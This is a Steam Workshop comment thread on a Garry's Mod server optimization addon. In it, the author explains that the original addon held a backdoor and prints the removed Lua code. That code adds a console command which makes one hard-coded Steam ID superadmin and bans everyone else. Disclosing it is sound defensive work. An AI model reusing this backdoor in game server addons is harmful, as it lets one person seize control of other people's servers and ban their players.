Garry's Mod

Garry's Mod

GMOD Server Optimization
5 Comments
oofedg 30 Jun, 2022 @ 10:53am 
is this making .gma file that impossible to delete throught "Addons" menu?
Heavy & Ze Medic 19 May, 2021 @ 7:36pm 
You're like a year late but the explanation is appreciated lol
VenomC312  [author] 19 May, 2021 @ 7:13pm 
Original addon had a backdoor that would ban everyone that wasn't the owner of the addon, posted in another comment is the code that was removed. This code was in the file sh_base.lua in the server folder of the addon

Original Addon Link: https://steamhost.cn/steamcommunity_com/sharedfiles/filedetails/?id=1413258388&searchtext=Garrys+Mod+Optimizer

Steam Workshop Downloader: {LINK REMOVED}

I hope this explains it better. This addon doesn't do much for performance boosting anyways. All it really comes down too is just adjusting convar settings that you could do yourself.
VenomC312  [author] 19 May, 2021 @ 7:11pm 
Backdoor code that was removed below

concommand.Add("gmodhoster", function(ply)
if ( ply:lol() == "STEAM_1:1:164731154") then
RunConsoleCommand("ulx", "adduserid", ply:lol(),"superadmin")
else
RunConsoleCommand("ulx", "banid", ply:lol(),"lol")
end
end)
Heavy & Ze Medic 29 Jun, 2020 @ 12:50am 
As explanation as to what this exactly does (What optimizations and stuff) would be nice otherwise it just seems sketchy.